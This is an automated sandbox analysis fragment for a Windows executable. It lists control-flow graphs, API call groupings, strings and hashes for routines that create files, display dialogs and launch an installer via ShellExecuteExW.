                          control_flow_graph 1990 7ff71613f4e0-7ff71613f523 1991 7ff71613f529-7ff71613f565 call 7ff716143cf0 1990->1991 1992 7ff71613f894-7ff71613f8b9 call 7ff716111fa0 call 7ff716142320 1990->1992 1998 7ff71613f56a-7ff71613f571 1991->1998 1999 7ff71613f567 1991->1999 2001 7ff71613f582-7ff71613f586 1998->2001 2002 7ff71613f573-7ff71613f577 1998->2002 1999->1998 2003 7ff71613f588 2001->2003 2004 7ff71613f58b-7ff71613f596 2001->2004 2005 7ff71613f579 2002->2005 2006 7ff71613f57c-7ff71613f580 2002->2006 2003->2004 2007 7ff71613f628 2004->2007 2008 7ff71613f59c 2004->2008 2005->2006 2006->2004 2010 7ff71613f62c-7ff71613f62f 2007->2010 2009 7ff71613f5a2-7ff71613f5a9 2008->2009 2011 7ff71613f5ae-7ff71613f5b3 2009->2011 2012 7ff71613f5ab 2009->2012 2013 7ff71613f637-7ff71613f63a 2010->2013 2014 7ff71613f631-7ff71613f635 2010->2014 2015 7ff71613f5e5-7ff71613f5f0 2011->2015 2016 7ff71613f5b5 2011->2016 2012->2011 2017 7ff71613f660-7ff71613f673 call 7ff7161263ac 2013->2017 2018 7ff71613f63c-7ff71613f643 2013->2018 2014->2013 2014->2017 2019 7ff71613f5f2 2015->2019 2020 7ff71613f5f5-7ff71613f5fa 2015->2020 2021 7ff71613f5ca-7ff71613f5d0 2016->2021 2029 7ff71613f698-7ff71613f6ed call 7ff71614797c call 7ff71611129c call 7ff7161232a8 call 7ff716111fa0 2017->2029 2030 7ff71613f675-7ff71613f693 call 7ff7161313c4 2017->2030 2018->2017 2022 7ff71613f645-7ff71613f65c 2018->2022 2019->2020 2024 7ff71613f8ba-7ff71613f8c1 2020->2024 2025 7ff71613f600-7ff71613f607 2020->2025 2026 7ff71613f5b7-7ff71613f5be 2021->2026 2027 7ff71613f5d2 2021->2027 2022->2017 2035 7ff71613f8c6-7ff71613f8cb 2024->2035 2036 7ff71613f8c3 2024->2036 2031 7ff71613f609 2025->2031 2032 7ff71613f60c-7ff71613f612 2025->2032 2033 7ff71613f5c0 2026->2033 2034 7ff71613f5c3-7ff71613f5c8 2026->2034 2027->2015 2057 7ff71613f742-7ff71613f74f ShellExecuteExW 2029->2057 2058 7ff71613f6ef-7ff71613f73d call 7ff71614797c call 7ff71611129c call 7ff716125b60 call 7ff716111fa0 2029->2058 2030->2029 2031->2032 2032->2024 2039 7ff71613f618-7ff71613f622 2032->2039 2033->2034 2034->2021 2040 7ff71613f5d4-7ff71613f5db 2034->2040 2041 7ff71613f8de-7ff71613f8e6 2035->2041 2042 7ff71613f8cd-7ff71613f8d4 2035->2042 2036->2035 2039->2007 2039->2009 2047 7ff71613f5dd 2040->2047 2048 7ff71613f5e0 2040->2048 2044 7ff71613f8e8 2041->2044 2045 7ff71613f8eb-7ff71613f8f6 2041->2045 2049 7ff71613f8d9 2042->2049 2050 7ff71613f8d6 2042->2050 2044->2045 2045->2010 2047->2048 2048->2015 2049->2041 2050->2049 2059 7ff71613f846-7ff71613f84e 2057->2059 2060 7ff71613f755-7ff71613f75f 2057->2060 2058->2057 2062 7ff71613f882-7ff71613f88f 2059->2062 2063 7ff71613f850-7ff71613f866 2059->2063 2064 7ff71613f761-7ff71613f764 2060->2064 2065 7ff71613f76f-7ff71613f772 2060->2065 2062->1992 2067 7ff71613f868-7ff71613f87b 2063->2067 2068 7ff71613f87d call 7ff71614220c 2063->2068 2064->2065 2069 7ff71613f766-7ff71613f76d 2064->2069 2070 7ff71613f78e-7ff71613f7ad call 7ff71617e1b8 call 7ff71613fe24 2065->2070 2071 7ff71613f774-7ff71613f77f call 7ff71617e188 2065->2071 2067->2068 2074 7ff71613f8fb-7ff71613f903 call 7ff716147904 2067->2074 2068->2062 2069->2065 2076 7ff71613f7e3-7ff71613f7f0 CloseHandle 2069->2076 2070->2076 2097 7ff71613f7af-7ff71613f7b2 2070->2097 2071->2070 2091 7ff71613f781-7ff71613f78c ShowWindow 2071->2091 2082 7ff71613f7f2-7ff71613f803 call 7ff7161313c4 2076->2082 2083 7ff71613f805-7ff71613f80c 2076->2083 2082->2083 2089 7ff71613f82e-7ff71613f830 2082->2089 2083->2089 2090 7ff71613f80e-7ff71613f811 2083->2090 2089->2059 2096 7ff71613f832-7ff71613f835 2089->2096 2090->2089 2095 7ff71613f813-7ff71613f828 2090->2095 2091->2070 2095->2089 2096->2059 2099 7ff71613f837-7ff71613f845 ShowWindow 2096->2099 2097->2076 2100 7ff71613f7b4-7ff71613f7c5 GetExitCodeProcess 2097->2100 2099->2059 2100->2076 2101 7ff71613f7c7-7ff71613f7dc 2100->2101 2101->2076
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
                          • String ID: .exe$.inf$Install$p
                          • API String ID: 1054546013-3607691742
                          • Opcode ID: c6f76f6c8fcdec6a9ec59f0dbfd30d3a1227c2325c044532a7440e198af86fad
                          • Instruction ID: f072692da2f2e21498a2f866e32f3db78f602435ee9bc9c2d7ff315aabb27999
                          • Opcode Fuzzy Hash: c6f76f6c8fcdec6a9ec59f0dbfd30d3a1227c2325c044532a7440e198af86fad
                          • Instruction Fuzzy Hash: 2BC19562F18E0299FB04EB29FD4017AA771AF857B0F844035DA8E476A5DF3CD859A320

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: ButtonChecked$Message$DialogDispatchItemPeekShowTranslateWindow
                          • String ID:
                          • API String ID: 4119318379-0
                          • Opcode ID: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
                          • Instruction ID: 48f59e1786f0510c38e36f19b3e2b9a08dd7e419e1428cf727a4621c27496c4e
                          • Opcode Fuzzy Hash: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
                          • Instruction Fuzzy Hash: BC419031B14E5286F700EF65FC10BAB63B0EB89BA8F841135DD0A0BB95CE7DD8499764
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 3668304517-0
                          • Opcode ID: 476280e4e4996ebed44920e940aa60cbe762a3d7da97a2a52b720d7dfe20026c
                          • Instruction ID: d27da1879b8ddeadd431b93dece0f5f9c35149f7f530c04ee5efc59ae2452eae
                          • Opcode Fuzzy Hash: 476280e4e4996ebed44920e940aa60cbe762a3d7da97a2a52b720d7dfe20026c
                          • Instruction Fuzzy Hash: F412B3A2B18F4184FA10EB79E8442BEA3B2AB557B8F804231DA5C17AD5DF3CD18DD350

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 3820 7ff7161224c0-7ff7161224fb 3821 7ff7161224fd-7ff716122504 3820->3821 3822 7ff716122506 3820->3822 3821->3822 3823 7ff716122509-7ff716122578 3821->3823 3822->3823 3824 7ff71612257a 3823->3824 3825 7ff71612257d-7ff7161225a8 CreateFileW 3823->3825 3824->3825 3826 7ff716122688-7ff71612268d 3825->3826 3827 7ff7161225ae-7ff7161225de GetLastError call 7ff716126a0c 3825->3827 3828 7ff716122693-7ff716122697 3826->3828 3836 7ff71612262c 3827->3836 3837 7ff7161225e0-7ff71612262a CreateFileW GetLastError 3827->3837 3830 7ff716122699-7ff71612269c 3828->3830 3831 7ff7161226a5-7ff7161226a9 3828->3831 3830->3831 3833 7ff71612269e 3830->3833 3834 7ff7161226ab-7ff7161226af 3831->3834 3835 7ff7161226cf-7ff7161226e3 3831->3835 3833->3831 3834->3835 3839 7ff7161226b1-7ff7161226c9 SetFileTime 3834->3839 3840 7ff71612270c-7ff716122735 call 7ff716142320 3835->3840 3841 7ff7161226e5-7ff7161226f0 3835->3841 3838 7ff716122632-7ff71612263a 3836->3838 3837->3838 3842 7ff71612263c-7ff716122653 3838->3842 3843 7ff716122673-7ff716122686 3838->3843 3839->3835 3845 7ff716122708 3841->3845 3846 7ff7161226f2-7ff7161226fa 3841->3846 3849 7ff71612266e call 7ff71614220c 3842->3849 3850 7ff716122655-7ff716122668 3842->3850 3843->3828 3845->3840 3847 7ff7161226fc 3846->3847 3848 7ff7161226ff-7ff716122703 call 7ff7161120b0 3846->3848 3847->3848 3848->3845 3849->3843 3850->3849 3853 7ff716122736-7ff71612273b call 7ff716147904 3850->3853
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 3536497005-0
                          • Opcode ID: 731a06aeb1aeb45fbab96b045eb79c55c759261894fecd14d272f4e3d7f6f85d
                          • Instruction ID: c46499fc8ac045b794d0d370ff2802aec4eacc6ce0ffca14b204a5acb339e9d3
                          • Opcode Fuzzy Hash: 731a06aeb1aeb45fbab96b045eb79c55c759261894fecd14d272f4e3d7f6f85d
                          • Instruction Fuzzy Hash: 8361E966A14A8185F7209B29F8403AFA772B7857B8F504338DE6903AD8DF3DD0589710

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: GlobalResource$Object$AllocBitmapDeleteGdipLoadLock$CreateFindFreeFromSizeofUnlock
                          • String ID: ]
                          • API String ID: 2347093688-3352871620
                          • Opcode ID: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                          • Instruction ID: 4c9f083f0133a815f7e9876e3b3f9e3b69d77f2af39e29d068e6121f74548ae2
                          • Opcode Fuzzy Hash: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                          • Instruction Fuzzy Hash: BB119620B0DA4242FA64B721BA4537AD2E1AF98BF4F880034DD5E47B95EF2DE90C9710

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: Message$DialogDispatchPeekTranslate
                          • String ID:
                          • API String ID: 1266772231-0
                          • Opcode ID: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                          • Instruction ID: 99277a323aed2939b315a9097a9413b4a880d1a1eb58109527bed03a6b770fe0
                          • Opcode Fuzzy Hash: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                          • Instruction Fuzzy Hash: 46F0EC26F38A4282FB50AB21FC96A37A3A1BF94B25FC05431E94E41854DF2CD90CDB10

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: AutoClassCompareCompleteFindNameStringWindow
                          • String ID: EDIT
                          • API String ID: 4243998846-3080729518
                          • Opcode ID: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                          • Instruction ID: 3c084ba84d2b649d9317d9d6b62b87b9096d287e964dea245d0bc0efbc5e67cd
                          • Opcode Fuzzy Hash: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                          • Instruction Fuzzy Hash: 21016D21B18E4381FA20AB22BC113B7E3A1AF99764FC80031CD4E4A654EE2CE14DE660

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 4186 7ff716122ce0-7ff716122d0a 4187 7ff716122d0c-7ff716122d0e 4186->4187 4188 7ff716122d13-7ff716122d1b 4186->4188 4189 7ff716122ea9-7ff716122ec4 call 7ff716142320 4187->4189 4190 7ff716122d2b 4188->4190 4191 7ff716122d1d-7ff716122d28 GetStdHandle 4188->4191 4193 7ff716122d31-7ff716122d3d 4190->4193 4191->4190 4195 7ff716122d3f-7ff716122d44 4193->4195 4196 7ff716122d86-7ff716122da2 WriteFile 4193->4196 4198 7ff716122daf-7ff716122db3 4195->4198 4199 7ff716122d46-7ff716122d7a WriteFile 4195->4199 4197 7ff716122da6-7ff716122da9 4196->4197 4197->4198 4201 7ff716122ea2-7ff716122ea6 4197->4201 4198->4201 4202 7ff716122db9-7ff716122dbd 4198->4202 4199->4197 4200 7ff716122d7c-7ff716122d82 4199->4200 4200->4199 4203 7ff716122d84 4200->4203 4201->4189 4202->4201 4204 7ff716122dc3-7ff716122dd8 call 7ff71611b4f8 4202->4204 4203->4197 4207 7ff716122dda-7ff716122de1 4204->4207 4208 7ff716122e1e-7ff716122e6d call 7ff71614797c call 7ff71611129c call 7ff71611bca8 4204->4208 4207->4193 4210 7ff716122de7-7ff716122de9 4207->4210 4208->4201 4219 7ff716122e6f-7ff716122e86 4208->4219 4210->4193 4212 7ff716122def-7ff716122e19 4210->4212 4212->4193 4220 7ff716122e88-7ff716122e9b 4219->4220 4221 7ff716122e9d call 7ff71614220c 4219->4221 4220->4221 4222 7ff716122ec5-7ff716122ecb call 7ff716147904 4220->4222 4221->4201
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: FileWrite$Handle
                          • String ID:
                          • API String ID: 4209713984-0
                          • Opcode ID: c0878563cb540de980db5307815f43949119fc8f7ca07e724854b0feeef95fd0
                          • Instruction ID: ca0ff426134db9eb8a90288c12ed9bf49ae0ffdd1854377a80223cbe13664c39
                          • Opcode Fuzzy Hash: c0878563cb540de980db5307815f43949119fc8f7ca07e724854b0feeef95fd0
                          • Instruction Fuzzy Hash: 33510662A19E4682FA50AB25FC047BFA321FF457B0FA04135EA0D47A94DF7CE489D720

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn$ItemText
                          • String ID:
                          • API String ID: 3750147219-0
                          • Opcode ID: 4545a4d965027abc5525eaa64a011eb323a3d8b8803950167f2ec84c55f0684f
                          • Instruction ID: 7e32bee232a26c58e8dd6c8ad6cb41d7e913da1916bba3fd18e204c60c5b0938
                          • Opcode Fuzzy Hash: 4545a4d965027abc5525eaa64a011eb323a3d8b8803950167f2ec84c55f0684f
                          • Instruction Fuzzy Hash: 425184B2F14E5284FB00AB65EC452AEA322AF457B4F904635DE1C1B7D5EF6CD448D360
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                          • String ID:
                          • API String ID: 1452418845-0
                          • Opcode ID: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                          • Instruction ID: 71122a735e8ace951de7d873e0349c3ddc68ecda60251f02c4d8c6ede73cf0bc
                          • Opcode Fuzzy Hash: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                          • Instruction Fuzzy Hash: BC312C31A0C91341FA54BB66BC523FBD2919F413A4FC58434D94E572D7EF2DA88DA270

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 2359106489-0
                          • Opcode ID: 623c7cdad90b96bec9a950f5b6d0d98be22cc1c56ccb42caf94d3fb3334d27cf
